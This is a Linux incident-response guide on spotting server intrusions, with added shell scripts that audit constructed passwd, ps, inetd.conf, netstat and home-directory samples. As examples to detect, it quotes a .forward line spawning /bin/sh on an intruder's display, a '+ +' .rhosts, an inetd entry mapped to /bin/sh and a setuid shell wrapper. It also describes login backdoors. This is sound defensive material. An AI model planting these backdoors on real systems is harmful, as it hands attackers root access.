How does Linux determine whether its server has been invaded?

1. Check the system password file

Start with the obvious: the password file. ls -l /etc/passwd shows when the file was last modified (an intruder can reset that date with touch, so an unchanged date proves nothing, but a recent change you did not make is a lead).

Then check which privileged users exist in the passwd file. Every account with uid 0 is root-equivalent, and the following prints all of them:

awk -F: '$3 == 0 {print $1}' /etc/passwd

 

While you are at it, check whether any account has a blank password. An empty second field in /etc/shadow means the account logs in with no password at all:

awk -F: 'length($2) == 0 {print $1}' /etc/shadow
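As an added example (not code from the original article), the two checks above are wrapped into functions and run against a constructed passwd/shadow pair, so the logic can be tried offline before being pointed at a suspect host. A third function joins the two files to report uid-0 accounts whose shadow entry is actually usable (not locked with * or !). The file paths and the sample accounts toor and alice are constructed for the example.

```shell
#!/bin/sh
# Added example: audit password files for extra uid-0 accounts and empty
# passwords. The sample files below are constructed, not taken from a real host.

# Every account whose uid (field 3) is 0 is root-equivalent; anything but root is suspect.
list_uid0_accounts() {
    awk -F: '$3 == 0 {print $1}' "$1"
}

# An empty password field (field 2 of shadow) means the account logs in with no password.
list_empty_password_accounts() {
    awk -F: '$2 == "" {print $1}' "$1"
}

# uid-0 accounts (from passwd, $1) whose shadow entry ($2) is not locked with
# * or !, i.e. root-equivalent logins that can actually be used.
list_enabled_uid0() {
    awk -F: 'NR == FNR { if ($3 == 0) uid0[$1] = 1; next }
             ($1 in uid0) && $2 !~ /^[*!]/ { print $1 }' "$1" "$2"
}

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed sample: "toor" is a second uid-0 account, "alice" has no password.
cat > "$WORK/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0::/:/bin/sh
EOF
cat > "$WORK/shadow" <<'EOF'
root:$6$saltsalt$hashedroot:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice::19000:0:99999:7:::
toor:$6$othersalt$hashedtoor:19000:0:99999:7:::
EOF

echo "uid 0 accounts:";        list_uid0_accounts "$WORK/passwd"
echo "empty passwords:";       list_empty_password_accounts "$WORK/shadow"
echo "usable uid 0 accounts:"; list_enabled_uid0 "$WORK/passwd" "$WORK/shadow"
# On a live host: list_uid0_accounts /etc/passwd; list_empty_password_accounts /etc/shadow
```

On a live system run the functions against /etc/passwd and /etc/shadow directly (the shadow file needs root). The join in list_enabled_uid0 matters because a second uid-0 account whose shadow entry is locked is still a finding, but one with a working password is an open door.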

 

2. Check the processes and look for anything strange

Focus first on inetd: ps -ef | grep inetd

inetd is the "super-server" daemon of UNIX systems. A legitimate inetd is started at boot, so it normally has a low PID; one with an unusually high PID was started later and deserves a closer look. If you see output like inetd -s /tmp/.xxx, pay attention to what follows inetd -s. Under normal circumstances the inetd service on a Linux system has no -s parameter, and inetd is never used to start a particular file; on Solaris, inetd -s appears by itself, again with no file argument. If ps shows inetd starting a file that you did not configure, someone has broken into your system and opened a simple backdoor with root privileges.

Enter ps -ef and go through the output, paying particular attention to processes whose command starts with ./xxx. Once you find a strange process, inspect the backdoor program the intruder left behind, then run kill -9 pid to kill it and run ps -ef again to confirm it is gone. If such a process keeps reappearing after being killed, someone has planted a script on the system that restarts the program automatically. At that point search carefully: find / -name "program name" -print. If an intruder really has planted a backdoor, the directory where the program turns up usually contains a lot of other interesting material.

Hidden processes under UNIX are sometimes achieved by replacing the ps binary itself. Detecting that requires checking file integrity, which is discussed later.

Next, trace the intruder step by step based on the file directory found on the server.
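As an added example (not part of the original article), the ps checks above are turned into a filter that can be run over saved ps -ef output: it flags commands run via a relative ./ path, binaries or arguments under /tmp, /var/tmp or /dev/shm, and an inetd started with -s and a file argument. The sample ps listing, its PIDs and the names .sniff and /dev/shm/.x/httpd are constructed. A second function does the same on a live Linux host by resolving /proc/<pid>/exe, which also exposes binaries deleted after they were started; since a replaced ps binary can forge the listing, the /proc view is worth cross-checking.

```shell
#!/bin/sh
# Added example: flag suspicious entries in "ps -ef" output.
# ps -ef columns: UID PID PPID C STIME TTY TIME CMD (CMD may contain spaces).

flag_suspicious_processes() {
    awk 'NR > 1 {
        cmd = $8
        for (i = 9; i <= NF; i++) cmd = cmd " " $i
        if ($8 ~ /(^|\/)inetd$/ && cmd ~ / -s /)
            reason = "inetd started with -s and a file argument"
        else if ($8 ~ /^\.\//)
            reason = "started via a relative ./ path"
        else if (cmd ~ /(^| )\/(tmp|var\/tmp|dev\/shm)\//)
            reason = "binary or argument under a temp directory"
        else
            next
        print $2 "\t" reason "\t" cmd
    }' "$1"
}

# Live variant (Linux only): resolve every process's executable through /proc.
# A target ending in "(deleted)" means the binary was removed after it started,
# a common way of hiding a backdoor from ls and find.
live_check_proc() {
    for exe in /proc/[0-9]*/exe; do
        target=$(readlink "$exe" 2>/dev/null) || continue
        case $target in
            /tmp/*|/var/tmp/*|/dev/shm/*|*"(deleted)")
                pid=${exe#/proc/}; pid=${pid%/exe}
                echo "$pid: $target" ;;
        esac
    done
    return 0
}

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed "ps -ef" snapshot of a host with three planted processes.
cat > "$WORK/ps.txt" <<'EOF'
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 09:00 ?        00:00:01 /sbin/init
root       412     1  0 09:00 ?        00:00:00 /usr/sbin/sshd -D
root      2231     1  0 09:31 ?        00:00:00 inetd -s /tmp/.xxx
alice     2290  2210  0 09:32 pts/0    00:00:00 ./.sniff
root      2301     1  0 09:33 ?        00:00:00 /dev/shm/.x/httpd
alice     2310  2210  0 09:34 pts/0    00:00:00 ps -ef
EOF

echo "suspicious processes (PID, reason, command):"
flag_suspicious_processes "$WORK/ps.txt"
if [ -d /proc/1 ]; then echo "live /proc check:"; live_check_proc; fi
```

The filter is deliberately simple; the point is to reduce a long listing to the handful of lines that need a human. Anything it prints should be followed up with ls -l on the binary and a look at its parent process, not killed blindly.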

3. Check the system daemon process

Check the /etc/inetd.conf file: cat /etc/inetd.conf | grep -v "^#" prints the remote services your machine starts through inetd.

A common intruder trick is to replace one of the in.xxx programs directly, for example replacing in.telnetd with /bin/sh, and then restart inetd. Every user who telnets to the server then gets a root shell directly, without entering a username or password.
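The following is an added example (not from the original article) that audits an inetd.conf the way this section and section 8 describe: it lists the enabled entries, flags any whose server program is a shell, lives under a temp directory or is not an absolute path, and, for server programs that exist on the host, reports ones not owned by root or world-writable. The sample inetd.conf, with its login entry pointed at /bin/sh and a port-5555 service under /tmp, is constructed.

```shell
#!/bin/sh
# Added example: audit an inetd.conf for suspicious service definitions.
# Field layout: service socket proto wait user server-program arguments...

# Print the enabled (uncommented) entries: service, user, server program.
list_enabled_services() {
    awk '!/^[[:space:]]*#/ && NF >= 6 { print $1, $5, $6 }' "$1"
}

# Flag entries whose server program is a shell (the in.telnetd -> /bin/sh trick),
# lives under a temp directory, or is not given as an absolute path.
flag_inetd_entries() {
    awk '!/^[[:space:]]*#/ && NF >= 6 {
        server = $6
        base = server; sub(/.*\//, "", base)
        if (base ~ /^(sh|bash|dash|ksh|csh|tcsh|zsh)$/)
            reason = "server program is a shell"
        else if (server ~ /^\/(tmp|var\/tmp|dev\/shm)\//)
            reason = "server program in a temp directory"
        else if (server != "internal" && server !~ /^\//)
            reason = "server program is not an absolute path"
        else
            next
        print $1 "\t" $5 "\t" server "\t" reason
    }' "$1"
}

# For each enabled server program that exists on this host, report files that
# are not owned by root or are world-writable: either lets a non-root user plant
# a program that inetd will then run as root.
check_server_binaries() {
    awk '!/^[[:space:]]*#/ && NF >= 6 && $6 != "internal" { print $6 }' "$1" | sort -u |
    while IFS= read -r prog; do
        [ -e "$prog" ] || continue
        find -L "$prog" -maxdepth 0 \( ! -user root -o -perm -0002 \) -print
    done
    return 0
}

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed inetd.conf: "login" has been pointed at /bin/sh and a port-5555
# service runs a binary hidden under /tmp.
cat > "$WORK/inetd.conf" <<'EOF'
# Internet server configuration database (constructed sample)
#ftp     stream  tcp     nowait  root    /usr/sbin/in.ftpd      in.ftpd
telnet  stream  tcp     nowait  root    /usr/sbin/in.telnetd   in.telnetd
shell   stream  tcp     nowait  root    /usr/sbin/in.rshd      in.rshd
login   stream  tcp     nowait  root    /bin/sh                in.rlogind
daytime stream  tcp     nowait  root    internal
5555    stream  tcp     nowait  root    /tmp/.x/bd             bd
EOF

echo "enabled services:";   list_enabled_services "$WORK/inetd.conf"
echo "suspicious entries:"; flag_inetd_entries "$WORK/inetd.conf"
echo "weak server binaries (live check):"; check_server_binaries "$WORK/inetd.conf"
```

A clean report from flag_inetd_entries does not mean the services are safe: an intruder who simply overwrote /usr/sbin/in.telnetd with a copy of sh leaves the configuration untouched. That case is what the integrity check in section 8 is for.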

4. Check the network connection and listening ports

Enter netstat -an to list all connections and listening ports on the machine, and check for listeners or connections you cannot account for.

Enter netstat -rn to check that the routing table and default gateway of this machine are correct.

Enter ifconfig -a to review the network interface settings.
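Here is an added example (not from the original article) of turning netstat -an output into a checklist: one function prints listening sockets whose port is not on an allowlist of services the host is supposed to run, and another prints established TCP sessions that are not clients of those services, which is where an outbound reverse shell or bot connection shows up. The netstat snapshot, the addresses and the port 31337 are constructed. On a live host save the output first (netstat -an > snapshot); netstat -anp or ss -tulpn additionally shows the owning process, which netstat -an alone does not.

```shell
#!/bin/sh
# Added example: find unexpected listeners and sessions in a saved "netstat -an".
# Column layout: Proto Recv-Q Send-Q Local-Address Foreign-Address [State]

# $1 = netstat -an output, $2 = space-separated ports this host is expected to serve.
unexpected_listeners() {
    awk -v allow="$2" '
        BEGIN { n = split(allow, p, " "); for (i = 1; i <= n; i++) ok[p[i]] = 1 }
        ($1 ~ /^tcp/ && $6 == "LISTEN") || ($1 ~ /^udp/ && NF == 5) {
            n = split($4, a, ":"); port = a[n]        # last field copes with IPv6 too
            if (!(port in ok)) print $1, $4
        }' "$1"
}

# Established TCP sessions that are not clients of an expected local service,
# i.e. connections this host initiated, or services we did not know about.
outbound_connections() {
    awk -v allow="$2" '
        BEGIN { n = split(allow, p, " "); for (i = 1; i <= n; i++) ok[p[i]] = 1 }
        $1 ~ /^tcp/ && $6 == "ESTABLISHED" {
            n = split($4, a, ":")
            if (a[n] in ok) next                      # inbound to a service we run
            print $4, "->", $5
        }' "$1"
}

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed snapshot: sshd, a local-only MTA and syslog/udp are expected;
# the listener on 31337 and the session to port 6667 are not.
cat > "$WORK/netstat.txt" <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:31337           0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             203.0.113.9:51022       ESTABLISHED
tcp        0      0 10.0.0.5:44321          198.51.100.7:6667       ESTABLISHED
udp        0      0 0.0.0.0:514             0.0.0.0:*
EOF

EXPECTED_PORTS="22 25 514"
echo "unexpected listeners:";     unexpected_listeners "$WORK/netstat.txt" "$EXPECTED_PORTS"
echo "outbound/unknown sessions:"; outbound_connections "$WORK/netstat.txt" "$EXPECTED_PORTS"
```

The allowlist is the important input: write down what the host is meant to serve before the incident, not during it, and treat every listener outside that list as unexplained until it is tied to a known process.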

5. Check the system log

The command last | more shows the login history of all users on the machine. Bear in mind, however, that both the login records last reads and the rest of the system logs depend on logging that intruders routinely attack: a common first step is to stop the system's syslog daemon. Check the syslog process and determine whether the time it was last started is plausible. Because syslog runs as root, any sign that it has been tampered with indicates a serious intrusion.

Under Linux: ls -al /var/log

Under Solaris: ls -al /var/adm

Check wtmp, utmp and messages, among others: are their sizes, contents and modification times what you would expect? Truncated or zero-length logs, or a gap ending just before the suspicious activity, are the marks of an intruder erasing traces by hand.

6. Check the core file in the system

Attacking a service with malformed requests is a routine intrusion method; the classic RPC exploits work this way.

Such attacks do not succeed every time, and a failed attempt typically crashes the service and leaves a core file in its working directory. To search the whole system for core files, enter find / -name core -exec ls -l {} \; and examine each one: its location, owner and timestamp tell you which service was attacked and when, and therefore whether an intrusion attempt took place.

7. .rhosts and .forward

These two files are well-known backdoor locations. To check whether an intruder has planted them, search the whole system for both:

find / -name ".rhosts" -print

find / -name ".forward" -print

A .rhosts file in a user's $HOME that contains just two plus signs (+ +) is extremely dangerous: if port 513 (rlogin, functionally equivalent to telnet) is open on your system, anyone from any host can log in as that user without any authentication.


Putting commands in a .forward file is a common way for an intruder to regain access on Unix. A user's $HOME/.forward might look like this:

\username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

Every mail delivered to that user then pops up an xterm running /bin/sh on the intruder's display. Variations include editing the system mail alias file (usually /etc/aliases). This is only the simplest form; a more advanced version runs a small script from .forward that executes arbitrary commands read from standard input (after a little preprocessing). Using smrsh is an effective defence against this backdoor, although if you allow elm's filter or procmail to run automatically there may still be problems. Under Solaris, if you run

ln -s /var/mail/luser ~/.forward

and then enable vacation, /var/mail/luser is copied to ~/.forward, "|/usr/bin/vacation me" is appended, and the old symlink is moved to ~/.forward..BACKUP.

If you find such files and did not create them, you can simply delete them.
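As an added example (not code from the original article), the following searches a tree for the two backdoor files described above and reports the dangerous forms: a .rhosts line consisting of "+" or "+ +", a .forward that pipes mail into a command, and a .forward that is a symlink (the Solaris vacation trick). The home directories, user names and file contents are constructed; the xterm line is the one quoted above.

```shell
#!/bin/sh
# Added example: search a tree for .rhosts and .forward backdoors.
# $1 is the root to search: / on a live host, or the mount point of a disk image.

# .rhosts lines consisting of "+" or "+ +" trust every host and/or every user.
find_rhosts_backdoors() {
    find "$1" -name .rhosts -type f 2>/dev/null | sort | while IFS= read -r f; do
        if grep -Eq '^[[:space:]]*\+([[:space:]]+\+)?[[:space:]]*$' "$f"; then
            echo "$f: wildcard trust (+ or + +)"
        fi
    done
    return 0
}

# A .forward that pipes to a command runs that command on every delivery; a
# .forward that is a symlink is the vacation trick described in the text.
find_forward_backdoors() {
    find "$1" -name .forward 2>/dev/null | sort | while IFS= read -r f; do
        if [ -L "$f" ]; then
            echo "$f: symlink to $(readlink "$f")"
        elif grep -q '|' "$f"; then
            echo "$f: pipes mail to a command"
        fi
    done
    return 0
}

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed home directories: alice, carol and dave are backdoored,
# bob and erin have legitimate files.
for u in alice bob carol dave erin; do mkdir -p "$WORK/home/$u"; done
printf '+ +\n' > "$WORK/home/alice/.rhosts"
printf 'trusted.example.com bob\n' > "$WORK/home/bob/.rhosts"
printf '\\carol|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"\n' > "$WORK/home/carol/.forward"
ln -s /var/mail/dave "$WORK/home/dave/.forward"
printf 'erin@example.com\n' > "$WORK/home/erin/.forward"

echo ".rhosts findings:";  find_rhosts_backdoors "$WORK"
echo ".forward findings:"; find_forward_backdoors "$WORK"
```

Run it against / on the live host (or against a mounted image of the disk, which is safer); the functions only read, so deleting the files remains a separate, deliberate step once you have recorded what was in them.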

8. Check the integrity of the system files.

There are many ways to check file integrity. The simplest is to compare the ls -l output for a file (size, owner, mode, date) against what you expect; this is crude but still has its uses, although it is of little help if ls itself has been replaced. Under Linux you can use rpm -V `rpm -qf filename` to verify a packaged file against the package database: a silent result means the file matches the installed package, any output means it has changed. Since the rpm database lives on the same compromised disk, for a serious case verify against the original package file instead with rpm -Vp package.rpm. rpm offers more verification options than can be covered here; see man rpm for the full set.

In UNIX systems, /bin/login is a file that intruders often replace with a backdoored copy. A word on the login backdoor:

Under UNIX the login program authenticates users arriving over telnet. The intruder obtains the login source and modifies it so that, when comparing the typed password with the stored one, it first checks for a backdoor password; if that matches, the administrator's password is ignored and the intruder walks straight in. This gives the intruder access to any account, including root. Because the backdoor grants access before the user is really logged in and before anything is recorded in utmp and wtmp, the intruder can log in and obtain a shell without the account ever showing up. Once administrators noticed this backdoor, they used the strings command to search the login binary for text, and in many cases the backdoor password stood out plainly. Intruders responded by encrypting or otherwise hiding the password so that strings reveals nothing useful. Many administrators therefore use MD5 checksums to detect this backdoor. UNIX systems have the md5sum command: md5sum filename prints the file's MD5 digest. Its options include: md5sum -b reads the file in binary mode; md5sum -c checks files against a list of previously recorded digests; md5sum -t reads the file in text mode. The recorded list must be kept off the host or on read-only media, otherwise the intruder simply updates it along with the binary.

As mentioned earlier, compare the daemons that are actually running with the uncommented lines in the daemon configuration file inetd.conf. As a simple example, if the telnet service is enabled the configuration file contains a line like:

telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

The program it runs is /usr/sbin/in.telnetd; check the integrity of that file, since intruders frequently create a backdoor for themselves by replacing the server program of a service that inetd is already allowed to start.

/etc/crontab under Linux is another file intruders frequently use. Beyond checking its integrity, cat /etc/crontab and read it carefully for entries that do something they should not; the per-user crontabs under /var/spool/cron deserve the same reading.

Starting a backdoor as a plain process, without replacing login or other binaries, has a drawback: a reboot kills it, so the backdoor must be made to start at boot. We therefore check the files under /etc/rc.d for backdoor programs launched at startup, much as one checks the startup locations for trojans under Windows.

While on the subject: if you find a file in some directory with attributes like -rwsr-xr-x 1 root root xxx .sh, it is a setuid-root executable, and any user who runs it gets a root shell. Run find / -perm -4000 -print to search the whole system for setuid files (the leading minus matters: -perm 4000 would only match a file whose mode is exactly 4000), compare the list against what the distribution installs, and delete the ones that do not belong.
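An added example (not code from the original article) of the checksum approach described in this section. It uses sha256sum rather than the md5sum the text names, since the two take the same -c list format and MD5 is obsolete as a cryptographic hash; the -c step is exactly what the text means by md5sum -c. It also shows the setuid search with the correct -perm -4000. The directory tree, the files bin/login and tmp/.sh, and the simulated tampering are constructed. The baseline must be recorded on a known-good system and kept off the host, and the checking tools themselves should come from trusted media, since a replaced sha256sum or find can lie just as a replaced ls can.

```shell
#!/bin/sh
# Added example: record a checksum baseline of a tree, detect changed files later,
# and list setuid executables. Paths below are constructed for the demonstration.

# Record the sha256 of every regular file under $1 (paths relative to $1) into $2.
make_baseline() {
    (cd "$1" && find . -type f -exec sha256sum {} + | sort -k2) > "$2"
}

# Compare the tree at $1 against baseline $2; print one "path: FAILED" line per
# changed or missing file. Always exits 0 so callers can count the lines.
verify_baseline() {
    (cd "$1" && sha256sum -c --quiet "$2" 2>/dev/null) | sed -n 's/: FAILED.*/: FAILED/p'
    return 0
}

# Regular files with the setuid bit set anywhere under $1. Note -perm -4000
# (bit set), not -perm 4000 (mode exactly 4000, which matches nothing useful).
find_setuid() {
    find "$1" -type f -perm -4000 -print 2>/dev/null | sort
    return 0
}

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
ROOT="$WORK/root"                  # stands in for / on a real host
BASELINE="$WORK/baseline.sha256"   # in practice: kept off the host

# Known-good state (constructed): two binaries, no setuid files.
mkdir -p "$ROOT/bin" "$ROOT/tmp"
printf 'genuine login binary\n' > "$ROOT/bin/login"
printf 'genuine ls binary\n'    > "$ROOT/bin/ls"
make_baseline "$ROOT" "$BASELINE"

# Simulated intrusion: login is replaced by a backdoored copy and a setuid-root
# shell wrapper is dropped in /tmp.
printf 'login binary with backdoor password\n' > "$ROOT/bin/login"
printf 'exec /bin/sh\n' > "$ROOT/tmp/.sh"
chmod 4755 "$ROOT/tmp/.sh"

echo "changed files since baseline:"; verify_baseline "$ROOT" "$BASELINE"
echo "setuid files:";                 find_setuid "$ROOT"
```

For a real host, take the baseline over /bin, /sbin, /usr/bin, /usr/sbin and /lib* right after installation, store it with the media, and re-run verify_baseline from a rescue boot or a mounted image when an intrusion is suspected; the replaced login and the setuid shell from this section both show up immediately.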

9. Check for kernel-level backdoors

A kernel-level backdoor is a real nuisance; when I run into one I usually just think about reinstalling the system. But back to the point. First list the modules the kernel has loaded: lsmod under Linux, modinfo under Solaris. A default Linux installation loads only a few modules, typically the network card driver and little else, whereas Solaris loads many, so there is no alternative to going through them one by one. Once the kernel is hardened, inserting and removing modules should be prohibited, otherwise an intruder can replace system calls again; this can be achieved by replacing create_module() and delete_module(), and it should be done as early as possible, before the intruder has the chance. If a backdoor module is loaded but does not appear in the module list (/proc/modules), the intruder may have used a tool to unlink the module from that list; the well-known knark kit includes one. In that case search the /proc directory carefully and identify hidden or disguised processes from what you find there and from experience. knark's backdoor module creates a /proc/knark directory, although that directory may itself be hidden.